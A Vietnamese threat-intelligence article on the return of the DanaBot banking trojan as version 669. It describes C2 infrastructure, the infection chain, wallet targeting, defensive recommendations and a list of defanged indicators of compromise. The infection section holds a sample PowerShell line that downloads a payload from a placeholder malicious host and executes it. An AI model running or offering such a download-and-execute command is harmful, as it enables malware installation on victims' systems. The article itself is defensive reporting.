# DanaBot Trở Lại Với Phiên Bản 669 Sau Khi Bị Triệt Phá Bởi Operation Endgame

Gần sáu tháng sau khi bị gián đoạn bởi chiến dịch truy quét toàn cầu *Operation Endgame* vào tháng 5/2025, malware ngân hàng khét tiếng **DanaBot** đã chính thức quay trở lại với một biến thể mới mang mã phiên bản **669**.

Các nhà nghiên cứu từ **Zscaler ThreatLabz** đã phát hiện biến thể này đang được triển khai trong các chiến dịch tấn công mới, cho thấy cơ sở hạ tầng chỉ huy–điều khiển (C2) đã được **xây dựng lại hoàn toàn**, kết hợp **IP truyền thống**, **miền Tor (.onion)** và hệ thống **backconnect**.

---

## **Bối Cảnh & Sự Trở Lại Của DanaBot**

DanaBot được công bố lần đầu vào năm 2018 bởi Proofpoint, vốn là một trojan ngân hàng viết bằng Delphi, phát tán thông qua email độc hại và malvertising. Trong nhiều năm hoạt động, nó trở thành một dịch vụ **malware-as-a-service (MaaS)** phổ biến, được thuê bởi nhiều nhóm tội phạm mạng.

Chiến dịch Operation Endgame đã triệt phá nhiều hạ tầng phân phối malware, khiến DanaBot gần như “biến mất”. Tuy nhiên, các phân tích mới cho thấy nhóm vận hành DanaBot đã nhanh chóng tái cấu trúc hệ sinh thái của mình.

---

## **Phiên Bản 669 – Nâng Cấp Về Ẩn Mình & Kiến Trúc**

Phiên bản DanaBot 669 thể hiện sự nâng cấp đáng kể về khả năng **ẩn mình**, **kháng phân tích**, và **tăng độ bền vững của hạ tầng**:

* Áp dụng nhiều lớp **obfuscation** và kiểm tra môi trường sandbox trước khi chạy payload.
    
* Tích hợp cơ chế **C2 hỗn hợp**, gồm:
    
    * IP-based C2:
        
        * 62.60.226\[.\]146:443
            
        * 62.60.226\[.\]154:443
            
        * 80.64.19\[.\]39:443
            
    * Tor C2 (.onion):
        
        * aqpfkxxtvahlzr6vobt6fhj4riev7wxzoxwltbcysuybirygxzvp23ad\[.\]onion
            
        * fejdqikkdwheckrutucbbyeovpdnef4bopz2fx636i67p3qpffpfxxad\[.\]onion
            
        * t77e4phezpwqebpbhdagr26ewkfaxytscimhxofws4wcisjo4wundead\[.\]onion
            
        * vsjyfpt7vcd6atniefmz36ikxrqk5eyv573a2af4e2ntb437wdch63yd\[.\]onion
            
* Hệ thống **backconnect** mới tại:
    
    * 158.94.208\[.\]102 (ports 443 & 8080)
        

Mục đích của mô hình C2 mới là đảm bảo **tính phục hồi**, **tính ẩn danh**, và **khó bị gỡ bỏ**.

---

## **Chuỗi Lây Nhiễm – Multi-stage và Tinh Vi**

DanaBot tiếp tục sử dụng nhiều vector tấn công quen thuộc:

* Email độc hại (link hoặc file đính kèm)
    
* SEO poisoning
    
* Malvertising  
    → Một số dẫn đến triển khai ransomware.
    

### **Giai đoạn đầu**

Victim bị dụ mở tài liệu hoặc tập tin đã bị làm mờ, kích hoạt loader chính. Loader này tải xuống module mã hoá từ các C2 server:

Ví dụ lệnh triển khai payload ban đầu:

```csharp
Invoke-WebRequest -Uri 'http://malicious-server/payload' -OutFile 'C:\Users\Public\payload.exe'; 
Start-Process 'C:\Users\Public\payload.exe'
```

### **Sau khi xâm nhập**

* Inject vào tiến trình Windows hợp lệ để **duy trì và tránh bị phát hiện**.
    
* Tạo scheduled tasks để đảm bảo chạy liên tục.
    
* Cho phép operator **tải xuống payload mới từ xa** nhờ kiến trúc mô-đun.
    

---

## **Khả Năng Tấn Công Tài Chính & Tiền Điện Tử**

Bên cạnh hành vi trộm thông tin ngân hàng truyền thống, phiên bản 669 tiếp tục nhắm đến các **ví tiền điện tử**:

### **Các địa chỉ wallet được ghi nhận:**

| Loại | Địa chỉ |
| --- | --- |
| **Bitcoin** | 12eTGpL8EqYowAfw7DdqmeiZ87R922wt5L |
| **Ethereum** | 0xb49a8bad358c0adb639f43c035b8c06777487dd7 |
| **Litecoin** | LedxKBWF4MiM3x9F7zmCdaxnnu8A8SUohZ |
| **TRON** | TY4iNhGut31cMbE3M6TU5CoCXvFJ5nP59i |

Dữ liệu đánh cắp được nén, mã hóa bằng **RC4**, sau đó gửi về C2 để tránh bị kiểm tra gói tin.

---

## **Khuyến nghị**

Sự trở lại của DanaBot cho thấy:

* Các nhóm tội phạm có thể **tái cấu trúc nhanh** ngay cả sau khi bị triệt phá.
    
* Operation Endgame có thể chỉ tạo ra sự gián đoạn tạm thời.
    
* Khi còn động lực tài chính, các chiến dịch malware-as-a-service vẫn tiếp tục sống lại.
    

**Khuyến nghị cho tổ chức:**

1. **Cập nhật blocklist** với các IoC mới do Zscaler cung cấp.
    
2. **Tăng cường bảo vệ email**, lọc phishing & maldoc.
    
3. **Giám sát hành vi bất thường trên endpoint**.
    
4. **Cập nhật đầy đủ EDR/AV**, đặc biệt với mẫu DanaBot 669.
    

---

## **IOC**

IP and domain:

62.60.226\[.\]146:443

62.60.226\[.\]154:443

80.64.19\[.\]39:443

158.94.208\[.\]102:443

158.94.208\[.\]102:8080

aqpfkxxtvahlzr6vobt6fhj4riev7wxzoxwltbcysuybirygxzvp23ad\[.\]onion:443

fejdqikkdwheckrutucbbyeovpdnef4bopz2fx636i67p3qpffpfxxad\[.\]onion:443

t77e4phezpwqebpbhdagr26ewkfaxytscimhxofws4wcisjo4wundead\[.\]onion:443

vsjyfpt7vcd6atniefmz36ikxrqk5eyv573a2af4e2ntb437wdch63yd\[.\]onion:443

---

## **Tham khảo**

1. [https://x.com/Threatlabz/status/1987965385036230779](https://x.com/Threatlabz/status/1987965385036230779)
    
2. [https://www.bleepingcomputer.com/news/security/danabot-malware-is-back-to-infecting-windows-after-6-month-break/](https://www.bleepingcomputer.com/news/security/danabot-malware-is-back-to-infecting-windows-after-6-month-break/)
    
3. [https://cybersecuritynews.com/danabot-malware-resurfaced-with-version-669/](https://cybersecuritynews.com/danabot-malware-resurfaced-with-version-669/)
